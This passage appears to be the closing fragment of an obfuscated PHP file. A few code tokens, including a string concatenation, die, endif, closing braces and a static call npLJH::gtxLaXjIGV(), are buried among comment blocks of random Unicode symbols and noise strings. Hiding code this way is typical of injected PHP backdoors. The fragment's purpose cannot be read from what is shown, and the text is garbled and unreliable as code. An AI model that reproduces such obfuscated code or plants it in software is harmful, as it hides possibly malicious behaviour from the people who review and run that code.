✏∤ⓗ⒄☋╝✣➑➻╥㈩╣⑸↵▱☀↚Ⓟ¢Ⓐ✦∮
R5)Q✏∤ⓗ⒄☋╝✣➑➻╥㈩╣⑸↵▱☀↚Ⓟ¢Ⓐ✦∮
-*///
(/*-
۵ⅲ➍‰▨⊵⓻
5Q۵ⅲ➍‰▨⊵⓻
-*///
$tKE/*-


⇁⊁⓹↞➷ℳ｜㈠★✗↜◷


|+,P|Z⇁⊁⓹↞➷ℳ｜㈠★✗↜◷


-*///
)/*-
⓳⋡⒩‡⒪▍⅐⅛/◯≽➪◾ⓥⒷ∎︿≃♙㊐
qIJ.mn.⓳⋡⒩‡⒪▍⅐⅛/◯≽➪◾ⓥⒷ∎︿≃♙㊐
-*///
 . /*-|RJ6;VTs3-*///
$ZioBFHWPS/*-tk-*///
[/*-I)h$-*///
0+8/*-f#FD5-*///
]/*-


♐Ⅻ∃➼♀┤∂Ⓜ◫┞⒒➉▩█ℑ﹣ℳ℗✫⋞﹢┡


j#}♐Ⅻ∃➼♀┤∂Ⓜ◫┞⒒➉▩█ℑ﹣ℳ℗✫⋞﹢┡


-*///
);/*-


►║✓Ⅺ‿⋍≥⅚⅗


l0d9►║✓Ⅺ‿⋍≥⅚⅗


-*///
/*-j$xDeJ-*///
die;/*-^NBM:-*///
 endif;/*-=)o`+P9-*///
 }/*-S=0-*///
}/*-L#-*///
npLJH/*-


ⓧⅸ☜∭⇜▒◰｜


_Fⓧⅸ☜∭⇜▒◰｜


-*///
::/*-rbf4@<hR-*///
gtxLaXjIGV/*-

⓸˜⋊∨㈡▤⓽㊀﹂⅟↷

G:BC#⓸˜⋊∨㈡▤⓽㊀﹂⅟↷

-*///
();/*-p4t8wvDj-*///
 ?>